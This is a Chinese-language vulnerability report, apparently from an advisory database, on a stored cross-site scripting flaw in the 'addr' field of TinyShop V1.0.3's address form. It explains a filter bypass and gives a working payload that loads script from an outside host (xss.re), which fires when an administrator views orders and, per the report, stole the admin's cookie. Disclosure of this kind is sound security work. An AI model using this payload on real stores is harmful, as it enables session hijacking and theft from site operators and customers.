TinyShop V1.0.3 储存型xss一枚。

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: rt ### 详细说明: 感觉对于TinyShop来说 xss危害还大一些。。因为sql注入出来的数据 密码md5加盐的 不一定解得出,xss的话除非这个站不要了。不然必定是会触发的。。(商城系统嘛~) 位于 修改地址处。的addr参数, 如果出现同时出现 <>的话 会被过滤,单独出现 就不会过滤,然而我们真的需要同时出现<>才能执行 xss么? 程序员 可以自己做个测试 ``` <p> <img src=x onerror="alert(1)" <p> ``` 这段代码是否可以alert 修改addr参数为 <img src=x onerror=document.body.appendChild(createElement(/script/.source)).src=alt alt=http://xss.re/4985 alt= 后台查看订单时触发 [<img src="https://images.seebug.org/upload/201408/10114535aab3c24c74ef445b8cb97868389000ac.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10114535aab3c24c74ef445b8cb97868389000ac.jpg) [<img src="https://images.seebug.org/upload/201408/10114544d2712fb1d892e0578f2079b3a9d8c592.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10114544d2712fb1d892e0578f2079b3a9d8c592.jpg) 成功偷取到管理员的cookie及其他信息 ### 漏洞证明: [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息